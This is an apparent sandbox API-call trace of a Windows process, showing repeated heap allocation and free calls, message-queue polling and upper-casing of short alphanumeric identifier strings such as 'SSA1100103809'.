[0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0211.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0211.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0211.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0211.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0211.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0211.738] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0211.738] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0211.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0211.738] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0211.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0211.739] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0211.739] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0211.739] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0211.739] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0211.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.740] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0211.740] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0211.740] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0211.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0211.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0211.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0211.741] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0211.741] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0211.741] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ff8 [0211.741] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0211.742] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0211.742] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0211.742] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0211.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.743] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ff8 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.743] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0211.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0211.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0211.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0211.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0211.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0211.744] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0211.744] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.745] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0211.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.746] 